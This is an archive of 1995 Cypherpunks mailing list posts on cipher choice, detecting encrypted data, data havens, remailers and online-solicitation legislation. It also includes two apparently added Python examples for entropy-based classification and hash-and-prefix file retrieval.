Message-ID: <9501122119.AA05796@doom.intuit.com>
MIME-Version: 1.0
Content-Type: text/plain



> What crypto functions are considered modern and usable?  The list I have
> right now is:
> 
> RSA
> IDEA
> DES
> 3DES
> RC4
> RC5
> BLOWFISH
> MD4
> MD5
> 
> (and FLAMINGO, a trivial test case, which consists of xor'ing every 8 chars
>  with "flamingo".)
> 
> Pointers to code for any other schemes will be greatly appreciated.

You might want to include LUC, even though it is fairly new and
extremely cumbersome to implement (though, I would say, not outright
unusable).

Among symmetric ciphers, there's GOST.

And I'd count SHA as a reliable hash function.


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Thu, 12 Jan 95 10:19:31 PST
To: Hal <cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <ab3b236e040210040733@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:01 PM 01/12/95, Hal wrote:
>The idea of offsite storage doesn't seem that helpful since you can just
>store the data on your own disk in encrypted form.  Maybe if encryption
>gets outlawed it would be useful, but then you can't use encryption to
>communicate with the haven.

Hmm. I post through a long anonymous remailer chain to an appropriate newsgroup:
"I have made an archive of state secrets (or trade secrets, for that
matter, or pornography), available on data haven Wherever. Ask to receive
the following file for a list of contents."

Seems it could be useful. Especially if you had some way of extracting
digicash payment from it, in an anonymous way.  But even if you didn't,
perhaps you want to make this info available as a public service. I sure as
heck wouldn't want it sitting on a hard drive in my bedroom.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Thu, 12 Jan 95 10:35:55 PST
To: jrochkin@cs.oberlin.edu
Subject: Re: Reefer madness
In-Reply-To: <ab3b202302021004413b@[132.162.201.201]>
Message-ID: <m0rSUVJ-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

   Date: Thu, 12 Jan 1995 13:10:08 -0500
   From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)

   At 9:35 AM 01/12/95, Russell Nelson wrote:
   >misdemeanor.  I spoke to Bob Penna, the legislative aide who
   >researched and wrote up the bill for Bill Sears.  He realizes that the
   >Internet cannot reasonably be censored, and that the solution is to be
   >able to punish people who do it (hence the felony) and to educate

   Well, in reality you still can catch them,  after all no one can sexually
   assault anyone over the internet (yet, anyway).

Mmmm, being the parent of two children, I have to disagree.  The brain
is the primary sexual organ, after all.

   Sometime they've got to do something in person, and there's no
   encryption in a physical meeting, where everyone sees your
   TrueFace.  But I'm not sure how much I trust the gubmint types to
   take this all into account, instead of just abolishing crypto on
   the typical four horsemen platform.

Hey, I don't trust the gubmint either, that's why I called Bob to get
an explanation.  I really *don't* think that New York State plans to
ban encryption, not now and not over this issue anyway.  His thrust is
1) to have the legal authority to sufficiently punish someone who goes
after children (which they don't have now), and 2) to educate guardians
about the risks of untoward communications from adults to children.

- -- 
- -russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?

-----BEGIN PGP SIGNATURE-----
Version: 2.7

iQCVAwUBLxV4bKbBSWSDlCdBAQETDgQAjTHvEkdBxIHvHFOWZjZwCy0V1EIVkImc
t0HcB1Zwm6YdHpHNHl8EZbFn7EVIR3ctv17Y52YhS8Ilsdux0m8dFPCmVIWEGVDT
pcZWFL3a4SB+pOcCeAL3frqhYS6+wACEfJbMgHPKv3QLwiej905GpC0qM1uwkX4x
D75Pf20F/nY=
=xHOc
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Thu, 12 Jan 95 14:28:47 PST
To: sandfort@crl.com
Subject: Re: Reefer madness
Message-ID: <9501122229.AA13951@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Sandy Sandfort

Ever seen a Turkish prison film, Reuben?
.........................................................

I don't get it.   (I haven't seen one)

Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brendan McKenna" <brendan@moe.oc3s-emh1.army.mil>
Date: Thu, 12 Jan 95 05:22:32 PST
To: cypherpunks@toad.com
Subject: Cryptanalysis
Message-ID: <9501121322.AA22913@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

	In light of recent threads about recognising whether or not a given 
message/file is encrypted, and using CBW and things along those lines, is there
any way to determine how something was encrypted?  For example, I know that
a statistical analysis of the cyphertext will uncover simple substitution
cyphers fairly quickly.  Does the same sort of analysis apply to determining
whether something was encrypted using IDEA or DES or RSA?  I realize that they
attempt to maximize the entropy of the cyphertext -- perhaps there is some
characteristic amount or range of amounts of entropy associated with these
cyphers?  Not every package is as nice as PGP in labeling everything it
encrypts with headers...   Any pointers would be greatly appreciated....


						Brendan

PS.  What I'd like to be able to do is take a given chunk of cyphertext and
     analyze it and say: "There is an x% probability that this was encrypted
     using method y...."  Hopefully I'd have a reasonable chance of recognizing
     how it was encrypted, and not all of the percentages would be so low as
     to make the exercise meaningless.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rparratt@london.micrognosis.com (Richard Parratt)
Date: Thu, 12 Jan 95 06:26:18 PST
To: brendan@moe.oc3s-emh1.army.mil
Subject: Re: Cryptanalysis
Message-ID: <9501121425.AA03332@pero>
MIME-Version: 1.0
Content-Type: text/plain


> 	In light of recent threads about recognising whether or not a given 
> message/file is encrypted, and using CBW and things along those lines, is there
> any way to determine how something was encrypted?  For example, I know that
> a statistical analysis of the cyphertext will uncover simple substitution
> cyphers fairly quickly.  Does the same sort of analysis apply to determining
> whether something was encrypted using IDEA or DES or RSA?  I realize that they
> attempt to maximize the entropy of the cyphertext -- perhaps there is some
> characteristic amount or range of amounts of entropy associated with these
> cyphers?  Not every package is as nice as PGP in labeling everything it
> encrypts with headers...   Any pointers would be greatly appreciated....

If the encryption method is any good, the output will be pseudo-random
with no digit being more frequent than any other. This certainly applies
to IDEA and DES. With RSA, you usually have a random (IDEA) session key
encrypted using the sender's private key. This will also be an effectively
'random' number.

> PS.  What I'd like to be able to do is take a given chunk of cyphertext and
>      analyze it and say: "There is an x% probability that this was encrypted
>      using method y...."  Hopefully I'd have a reasonable chance of recognizing
>      how it was encrypted, and not all of the percentages would be so low as
>      to make the exercise meaningless.

This would only work for ciphers that are effectively 'broken'. Also, many
packages and users compress data before encryption. Compression algorithms
work by removing patterns from data, so the resultant compressed plaintext
becomes fairly random anyway, removing the utility of frequency analysis.

--
Richard Parratt
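
The point made in the reply above, and the earlier remark in this archive that compressed graphics pass an entropy test but carry a distinctive header, as an added sketch that is not part of either post. The sample data is constructed, os.urandom stands in for good cipher output, and the 7.5 bits-per-byte cut-off and the header table are assumptions.

```python
import math
import os
import random
import zlib
from collections import Counter

# A few well-known leading byte strings; not an exhaustive table.
MAGIC = {
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"-----BEGIN PGP": "pgp-armor",
}
HIGH_ENTROPY = 7.5  # bits per byte; assumed cut-off for "looks random"


def byte_entropy(data: bytes) -> float:
    """Shannon entropy of the byte histogram, in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    return -sum(n / total * math.log2(n / total)
                for n in Counter(data).values())


def classify(data: bytes) -> str:
    """Header check first, then the entropy test, as a filter might do."""
    for magic, name in MAGIC.items():
        if data.startswith(magic):
            return "header:" + name
    if byte_entropy(data) >= HIGH_ENTROPY:
        return "high-entropy"
    return "low-entropy"


def constructed_samples(seed=1995):
    """Build labelled sample inputs; none of them is real traffic."""
    rng = random.Random(seed)
    vocab = ("remailer haven cipher packet header entropy filter batch "
             "sender message random storage operator traffic key chunk "
             "archive signal pattern output volume source format test").split()
    text = " ".join(rng.choice(vocab) for _ in range(50_000)).encode()
    # Raw deflate (wbits=-15) emits no zlib or gzip header of its own.
    deflater = zlib.compressobj(9, zlib.DEFLATED, -15)
    packed = deflater.compress(text) + deflater.flush()
    return {
        "text": text,                      # plain words, low entropy
        "compressed": packed,              # compressed plaintext, no header
        "gif-like": b"GIF89a" + packed,    # same bytes behind a known header
        "random": os.urandom(len(packed)), # stand-in for cipher output
    }


def report():
    """Return {name: (entropy, label)} for every constructed sample."""
    return {name: (round(byte_entropy(blob), 3), classify(blob))
            for name, blob in constructed_samples().items()}


if __name__ == "__main__":
    for name, (bits, label) in report().items():
        print(f"{name:<11} {bits:5.3f} bits/byte  {label}")
```

The headerless compressed sample and the random sample get the same label, so the byte histogram alone cannot say which one, if either, is ciphertext.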




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Thu, 12 Jan 95 14:34:47 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <199501122233.OAA02325@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


You wrote: 

>You don't always need the correct answer.  You just need the correct
>answer most of the time.  You're trying to create a presumption about
>behavior.  Ensuring that you can't read almost all of the traffic is a
>pretty good way to assure people that you don't try to make sense of
>any of it.


I'm still not making my point.  Encryption is not a data 'state' that can 
be tested for in the way that liquid/solid/vapour are states 
of matter.  Encryption is a data 'interpretation' for which there are an 
arbitrarily large number of interpretations available for any 
given dataset. There is no algorithmic test that can be applied to a dataset 
that will be able to establish the existence or non-existence 
of a given interpretation.  If you're given an unknown dataset and are 
asked the question, 'Is this an image file' or 'Is this an encrypted 
file' or 'Is this an audio clip', there is no algorithmic test that can 
answer any of these questions in either the affirmative or the negative. 
 This is just an alternate phrasing of Goedel's Undecidability Theorem.  
This problem lies permanently outside the outer boundary of algorithmic 
capability.

Let me now spin a little tale as to how this affects an operator of a 
re-mailer or datahaven.  This tale has two characters, Paco the child 
pornographer and Eric the honest RM/DH operator.  Paco begins by 
inventing the new 'Foolproof Barometric Graphic Image Format' (aka FooBar 
GIF) of which only Paco knows the internals.  A FooBar GIF has a 
statistical profile that looks remarkably like a PGP file, in fact it 
even comes with a PGP header!  Nothing illegal here.  Now Paco writes a 
FooBar GIF Viewer which he sells to child-porn types. Again, there's 
nothing illegal about the sale of such a piece of software.  Paco now 
anonymously loads Eric's DH with lots of child-porn FooBar GIF's via 
Eric's anon-RM.  These files of course sail right through Eric's filters 
with nary a scratch.  As far as Eric knows he's holding PGP encrypted 
files.  Now Paco advertises the availability of lots of 'good' pictures on 
Eric's DH that can be used with the newly purchased FooBar GIF Viewers.  

Then the cops get ahold of one of Paco's FooBar GIF Viewers and download 
some FooBar GIFs from Eric's DH and the last words we ever hear from Eric 
are "I swear I thought they were PGP files, I swear to God I thought they 
were....." as the authorities drag his carcass off to jail.  Who's going 
to believe Eric's protests of innocence?  "After all", says the 
prosecutor to the jury, "wasn't Eric explicitly filtering out what he 
didn't want in. In fact", says the prosecutor, "his filter seems to have 
been designed specifically to allow these kiddie-porn files in and to 
reject all others."  A sad end indeed!

Dale H.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 12 Jan 95 14:54:26 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <199501121701.JAA24309@jobe.shell.portal.com>
Message-ID: <199501122252.OAA01584@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Hal <hfinney@shell.portal.com>

   The idea of offsite storage doesn't seem that helpful since you can just
   store the data on your own disk in encrypted form.  

I'll tell you one really useful facility for offsite storage, and
that's private key backup.  Use a secret sharing arrangement, say 5
out of 7 reconstruction, and send out 7 chunks.  Now, give a different
pointer-to-chunk to each of 7 different people.  In the case of
catastrophe, you can recover your key.

Too paranoid not to let your key out of your sight?  Then don't do
this.

Here's another use.  I'd like to interlock offsite backup with my
digital money withdrawals, so that my money is always backed up.

Let's be clear; the code that dfloyd@io.com is working on is offsite
storage in a reasonably secure form.  It's not a data haven.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@thor.cs.umass.edu>
Date: Thu, 12 Jan 95 11:48:08 PST
To: cypherpunks@toad.com
Subject: Re: Chain and Shifting Remailer Addresses
Message-ID: <199501121953.OAA26211@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Offshore Assets writes:
> I use Hal Finney's 'Chain' a lot:

Uh, I think you probably mean Lance Cottrell, not Hal -- unless Hal's also
written a similar utility with an identical name, about which I haven't heard.

> [...] But it won't PGP correctly with the Usura
> and the Flame remailers because these two have e-mail addresses that 
> have changed and/or are different from the addresses specified in their
> public keys (Usura, for instance, is now <usura@replay.com>, but this 
> is not the address given in its public key ID). 

Alex de Joode posted a copy of the usura key edited to reflect the domain name
change to alt.privacy.anon-server. It's presumably on the keyservers....

Oh, and the flame remailer passed away with the closure of the jpunix remailer,
as far as I can tell. (I vaguely recall something to the effect that sinet.org
is/was registered as a subdomain of jpunix.com, but I might well be wrong.)

Hope this helps.

 -L. Futplex McCarthy


- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxWIfyoZzwIn1bdtAQHcYwF/alAsviWQvyzf4Qg1JR+G0l1sP3o6AGZN
xvaxIZsKhhX03RNogflWZPBah3y8DnCa
=aVDR
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fhalper@pilot.njin.net (Frederic Halper)
Date: Thu, 12 Jan 95 12:20:02 PST
To: mark@unicorn.com
Subject: Re: Reefer madness
Message-ID: <9501122019.AA14798@pilot.njin.net>
MIME-Version: 1.0
Content-Type: text/plain


mark@unicorn.com wrote:

> But what happens if, say, a minor is solicited for sex when they are
> pretending to be older than they are ? Or if the solicitation comes via a
> remailer ?  Or a minor with a grudge fakes email to show that someone
> attempted to get them to agree to sex/picture-taking or whatever ?
> 
> Once you pass laws making some forms of communication illegal, you're
> immediately getting into dodgy territory requiring is-a-person
> credentials and so on. That isn't necessarily a problem if it's voluntary
> (e.g. your kids accounts might be set up to only accept mail from people
> who're certified to be under 18 or whatever), but governments are
> unlikely to do things that way.

Any person no matter their age should be wary if someone solicits them for sex.
I'm 16 years old and have been on the Internet for a little more than a year and
I haven't nor have I met anyone who has been approached by a pedophile.  The 
examples used are isolated incidents, which could have likely been prevented had
they discussed it with their parents or tried to obtain more info about the 
person they were going to meet.
-RH

---------------------------------------------------------------------------------
Reuben Halper                          I'm not growing up, I'm just burnin' out."
Montclair High                                          - Green Day -
Montclair, NJ
E-mail: fhalper@pilot.njin.net                    PGP 2.6ui Public Key
                                                  available upon request
---------------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Thu, 12 Jan 95 13:03:28 PST
To: Censored Girls Anonymous <carolb@barton.spring.com>
Subject: Re: Data Havens..A consumer perspective
In-Reply-To: <Pine.3.89.9501120150.C3416-0100000@barton.spring.com>
Message-ID: <Pine.SUN.3.91.950112154736.27697D-100000@access3.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Jan 1995, Censored Girls Anonymous wrote:

> Date: Thu, 12 Jan 1995 02:32:06 -0600 (CST)
> From: Censored Girls Anonymous <carolb@barton.spring.com>
> To: cypherpunks@toad.com
> Subject: Data Havens..A consumer perspective
> 
> 
> 1. You have what I want or need.

As far as what...?  Data already in the haven?  Storage capacity?  Speed 
of link?

> 2. In order for me to let you store it, I will give it to you
>    anyway you wish to get it.

Does this include on old style magnetic reel to reel?  Clearly there has 
to be some simplicity of submission.  I would further submit that many 
"consumers" will not want to store plaintext data, and thus "any way you 
wish to get it." quickly becomes unacceptable.

> 3. I will let you do anything to the data you wish, so long as I  
>    get it back intact.

Again, does this include storing it in a /pub/ dir on an ftp site in 
plaintext?  No, there must be a clear stated policy of the site 
operator's method of storage.

> 4. It is no concern (only idle curiosity maybe) where the data is parked.

This ignores jurisdictional concerns that may have significant, even 
severe impact.

> 5. I would expect to pay money for the safekeeping of my data.

What kind of money?  Digital postage?  New currency?  DM? $?
This too is a simplistic representation of the real concern.

> 6. I would expect the longer you hold the data, the more it will cost.

I assume you mean day to day cost, not rates by data age?
Though this brings up an interesting point, what would be the incentives 
served and created by charging on a phase in scale?  i.e., what would be 
the result if a DH were to charge $ .05 a day for data that had been in 
the DH for over a month, and $ .09 a day for data over a year?  It would 
at the very least, increase traffic as old data was taken out and put 
back in to avoid the stepped up "latency" charge.  If all the data was 
encrypted, would this help deter traffic analysis by imposing 
"productless" transactions resulting in no net change in the DH's holdings?

Hmmmmm.

> 7. The only thing I am counting on is the data's timely retrieval.

And not its ability to be directed to specific parties, rather than the 
public at large?  And not its ability to avoid traffic analysis?  And not 
its ability to be multi or non-jurisdictional?

> 8. Welcome to the world of data "coatchecking".

I've lost several coats this way.

> Why make it more complex than this?

Why insist on this simplicity?  Why not store it on your own machine if 
these are your only requirements?

> From the moment the data leaves their hands, until I return it,
> they have no right, nor I no obligation, to divulge anything about it.
> For they already would know, it would take a few minutes to retrieve it.

This was to be from a consumer's perspective I thought.  In any event, 
this ignores the possibility of court ordered disclosure, availability to 
third and fourth parties, and traffic analysis concerns.

> For whether it's encrypted to the nth degree, or parked in a plain brown
> wrapper in a massive unix box somewhere, as long as I the haven manager,
> return the data in a safe, timely, uncorrupted manner, I've done my duty.

What you are talking about has little if anything to do with "Data 
Havens"; you're just selling storage space.

> Carol Anne


073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pdlamb@iquest.com (Patrick Lamb)
Date: Thu, 12 Jan 95 14:32:59 PST
To: cypherpunks@toad.com
Subject: Re: Multiple symetric cyphers
Message-ID: <199501122232.QAA04830@vespucci.iquest.com>
MIME-Version: 1.0
Content-Type: text/plain


>In article <199501120502.VAA29808@largo.remailer.net>,
>Eric Hughes <eric@remailer.net> wrote:
>>   From: cactus@seabsd.hks.net (L. Todd Masco)
(bunch of stuff deleted)

>>   I guess this reduces to: do strong cyphers have "signatures" of some sort,
>>   by which the type of encryption can be derived? 
>>
>>If they do, they're likely not _strong_ ciphers.
>
>Great... that's the answer I was looking for, and what my gut feeling
>was.  I'm trying to determine how much rope is too much for a first pass.
>
>Related: is there, in general or in any known specific cases, any loss of
>security in using sym. cipher A on ciphertext B (of another sym. cipher) with
>the same key?  With different keys (I would think not, but I vaguely
>remember mention of something here long ago)?

Is this asking the question, "Does DES form a group with IDEA?"  (Substitute
your favorite cipher.)  Since it took about 15 years to figure out DES is
_not_ a group, I suspect it will take a long time to figure out the answer
to that question for each pair of ciphers you're going to substitute.

Seems to me it's a good basic idea.  If it costs, for example, a million
bucks to crack a cipher; you have three ciphers that can be used; then the
best-case cost to crack a message just tripled!  Of course, if you choose
two ciphers stronger than DES, it probably went up a little more (g).

If the ciphers don't form a group, you just made your system unbreakable.
Just use two ciphers.  Then a brute-force attacker has to check each key for
each cipher once when it is applied first, and once for each of the possible
keys for the other cipher when it is applied second!

Sounds too good to be true.  Am I missing something?

        Pat





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syed Yusuf <yusuf921@uidaho.edu>
Date: Thu, 12 Jan 95 17:11:04 PST
To: Samuel Kaplin <skaplin@mirage.skypoint.com>
Subject: Re: FBI and BLACKNET
In-Reply-To: <WO55lKjqRey2077yn@mirage.skypoint.com>
Message-ID: <Pine.HPP.3.91.950112170758.18085D-100000@goshawk.csrv.uidaho.edu>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 11 Jan 1995, Samuel Kaplin wrote:

> I hope they took you someplace nice for lunch...You might want to file a
> FOI request on yourself, just to see how much they censor. ;) They might
> think you're the ringleader, after all the FBI doesn't buy peons lunch. ;)
> 

For the benefit of myself and the list, how would you go about doing that?


> Sam
> skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
> E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
> Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
>             A man wrapped up in himself makes a very small package.

--Syed




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: grmorgan@freenet.vcu.edu (Greg Morgan)
Date: Thu, 12 Jan 95 14:46:08 PST
To: cypherpunks@toad.com
Subject: Re: Multiple symetric cyphers
Message-ID: <9501122245.AA18097@freenet.vcu.edu>
MIME-Version: 1.0
Content-Type: text/plain




>
>> But selecting a single cipher is just as much a fixed policy as a
>> randomly selected one is.  Far better to let the user pick a policy,
>> both about sent and accepted ciphers.
>
>If you do give the user control, what is an acceptable mechanical
>implementation? Let's say I have a file encryptor which allows the
>user to choose between DES, 3DES, IDEA, Diamond, and RC5. Must I
>require the user to tell that program what cypher was used to encrypt
>the file she wishes to decrypt?
>
>Is storing the cypher type as part of the encrypted file a weakness?

Perhaps an MD5 of the password could be encrypted along with the
plaintext using the method(s) of choice.  At the decryption
phase, the password would be MD5 hashed again and the block of
bytes the size of an MD5 hash would be "decrypted" with each of
the methods... whichever one matches the original MD5 hash
would be used to decrypt the rest of the cyphertext.

This method wouldn't leave a known plaintext in the file to
attack.

--
-----------------------------------------------------------------------------

Greg Morgan <grmorgan@freenet.vcu.edu> | "I dunno Brain, me and
Pipi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter F Cassidy <pcassidy@world.std.com>
Date: Thu, 12 Jan 95 14:48:31 PST
Subject: Re: Reefer madness
In-Reply-To: <9501122229.AA13951@netmail2.microsoft.com>
Message-ID: <Pine.3.89.9501121721.A25153-0100000@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain



Who are the big public key registries out there now? Just got a call 
that the USPS is developing its own public key registry. Is this news to 
you guys?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Feuer <adamfast@seanet.com>
Date: Thu, 12 Jan 95 18:15:04 PST
To: cypherpunks@toad.com
Subject: essential characteristics of a Data Haven
Message-ID: <Pine.NXT.3.91.950112180625.3304B-100000@kisa>
MIME-Version: 1.0
Content-Type: text/plain


folks,

  looking thru the cyphernomicon, this is about all i could come up with
for characteristics of a data haven:

|16.22. Data Havens
|  16.22.1. "What are data havens?"
|           + Places where data can be hidden or protected against legal
|              action.
|             - Sterling, "Islands in the Net," 1988


  anyone have a list of the essential characteristics of a data haven?
what differentiates a "data haven" from "reasonably secure offsite
storage"?

here's my attempt at a working definition:


a "data haven"...

1. "securely" stores data files for remote users.
2. will only allow "authorized" entities to store files in the data haven.
3. will only allow "owners" of the files to withdraw their files from the 
      data haven. 
4. differentiates "authorized" entities from "non-authorized" ones, and 
      "owners" from "non-owners", only by means of cryptographic keys.

  terms i left undefined are "securely," "authorized," and "owner." by
"secure" i imagine a DH will attempt to prevent its data from being
destroyed, or read by anyone other than the data's "owner." by
"authorized" i imagine that a DH will not want to accept data from
just anyone. (for instance, people who don't pay.) by "owner" i mean
the specific "authorized" entity that stored the data in the DH.

  i imagine that most DH's will need to accept digital cash to be able
to operate. is this an essential characteristic of a cp data haven?
what did i leave out?

adam

adamfast@seanet.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben.Goren@asu.edu
Date: Thu, 12 Jan 95 17:17:50 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <v02110100ab3b6fb73f29@[129.219.97.131]>
MIME-Version: 1.0
Content-Type: text/plain


Here's a solution:

Alice sends a file to Dave's DataHaven. When Alice wants her file back, she
sends to Dave a secure hash of the file, a key with which to decrypt it,
and a handful of plaintext at the beginning of the file. Dave decrypts the
file that matches the hash with the key Alice gave him; if the file begins
as Alice says it should, Dave returns the file to Alice.

This way, only those people who have an intimate knowledge of the files can
recover them.

The hash isn't vital; Dave could try to decrypt each file on the server
with the key Alice gives him until he matches the plaintext--but that's
neither elegant nor friendly to the CPU.

People can send Dave whatever kind of file they like, but they'll only get
it back if it's been encrypted properly. If Dave charges to store a file,
he'll gladly welcome as much spammage as people want to send him. If he
likewise charges to return a file, he'll just as gladly send a file to
whoever gives him the cash and can identify it.

Dave can have a policy whereby he deletes a file after returning it, unless
Alice pays more to keep it there. Thus, Bad Bobby can send his naughty
pictures to Dave, tell the 'net how to get them--but the first person who
neglects to include the fee to leave the pictures there winds up blocking
out everybody else. Similarly, Samaritan Sam could get into a spending war
with Bobby. Each time Bobby sends Dave his smut, Sam retrieves the file
without paying for its continued storage--and takes a sneak peek at the
pictures before deleting them himself.

Dave has no way of knowing what people are storing on his machine until the
owner asks for the file back, and so cannot be held liable for the storage
of "undesirable" files. Mallet could seize the entire archive and have
nothing useful. Eve could recover information leaving the haven, but
presumably Alice will further encrypt her files however she chooses. Or, as
a service, Dave could agree to encrypt the file with an asymmetric cipher
before returning it.

b&

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0xCFF23BD5.
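
The retrieval check described in the message above, as an added example that is not part of the original post: the SHA-256 keystream stands in for whatever cipher Alice actually uses, and the `Haven` class, the 16-byte minimum prefix and the choice to index by a hash of the ciphertext are assumptions made for this illustration.

```python
"""Hash + key + plaintext-prefix retrieval from a blob store (added example)."""
import hashlib
import hmac

MIN_PREFIX = 16  # assumed policy: shorter prefixes are too easy to guess


def keystream_xor(key: bytes, data: bytes) -> bytes:
    """Stand-in cipher for illustration only: XOR with SHA-256(key || counter).
    The same call encrypts and decrypts. Not a vetted cipher."""
    out = bytearray()
    for offset in range(0, len(data), 32):
        pad = hashlib.sha256(key + (offset // 32).to_bytes(8, "big")).digest()
        out.extend(b ^ p for b, p in zip(data[offset:offset + 32], pad))
    return bytes(out)


class Haven:
    """Dave's side: holds opaque blobs and never sees a key until retrieval."""

    def __init__(self):
        self._blobs = {}  # SHA-256(ciphertext) hex digest -> ciphertext

    def store(self, ciphertext: bytes) -> str:
        digest = hashlib.sha256(ciphertext).hexdigest()
        self._blobs[digest] = ciphertext
        return digest

    def retrieve(self, digest: str, key: bytes, prefix: bytes, paid_to_keep=False):
        """Return the decrypted file only if it begins with `prefix`.
        Returns None on unknown hash, short prefix, or mismatch."""
        blob = self._blobs.get(digest)
        if blob is None or len(prefix) < MIN_PREFIX:
            return None
        plaintext = keystream_xor(key, blob)
        # Constant-time comparison so timing does not leak how much matched.
        if not hmac.compare_digest(plaintext[:len(prefix)], prefix):
            return None
        if not paid_to_keep:
            del self._blobs[digest]  # delete-after-return policy from the post
        return plaintext


if __name__ == "__main__":
    # Constructed sample data.
    key = b"alice-file-key-1"
    document = b"Alice's ledger, January 1995: opening balance 100.00"
    haven = Haven()
    ticket = haven.store(keystream_xor(key, document))
    print(haven.retrieve(ticket, b"mallet-guess-key", document[:16]))  # None
    print(haven.retrieve(ticket, key, document[:16]))                  # the file
    print(haven.retrieve(ticket, key, document[:16]))                  # None, deleted
```

A failed attempt leaves the blob in place here; whether a wrong guess should also cost a fee or be rate-limited is a policy question the post leaves open.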






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 12 Jan 95 15:30:08 PST
To: NetSurfer <cypherpunks@toad.com
Subject: Re: Microsoft TrueName (tm) (fwd)
Message-ID: <v01510104ab3b6305a759@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 11:23 AM 1/12/95, NetSurfer wrote:

>I wondered why one of the few registered hosts for Microsoft were called
>"Bob" - now it makes sense.  (But they've got a good sized chunk of
>netblks registered...)

Funny thing happened to me last night. I was talking to a guy who had seen
Fidelity's new WWW server (shhh! don't tell!) and it turns out he was the
guy who actually *had* bob.com. A third party approached him and asked him
if he wanted to sell the domain name. He did. He picked another domain
name, and last week someone called him to ask if he wanted to sell his *new*
domain name. He said no, and they asked him if he would *rent* it to
them...

Go figure.

Cheers,
Bob Hettinga

Eric, what'll you take for "remailer.net"? ;-).


-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 12 Jan 95 15:30:13 PST
To: cypherpunks@toad.com
Subject: Available: Cash paper by anonymous FTP
Message-ID: <v01510105ab3b652526f9@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


>From: brands@cwi.nl
>Original-From: Stefan.Brands@cwi.nl
>Subject: Available: Cash paper by anonymous FTP
>To: www-buyinfo@allegra.att.com
>Date: Thu, 12 Jan 1995 18:57:39 +0100 (MET)
>Mime-Version: 1.0
>Status: U
>
>
> I have made available for ftp-retrieval my paper
>
>       "Off-Line Electronic Cash Based on Secret-Key certificates."
>
> This paper will be presented at the Second International Symposium of
> Latin American Theoretical Informatics (LATIN '95), April 3-7, 1995.
>
> If you are interested in downloading a copy, login by anonymous ftp at
>
>                          ftp.cwi.nl
>
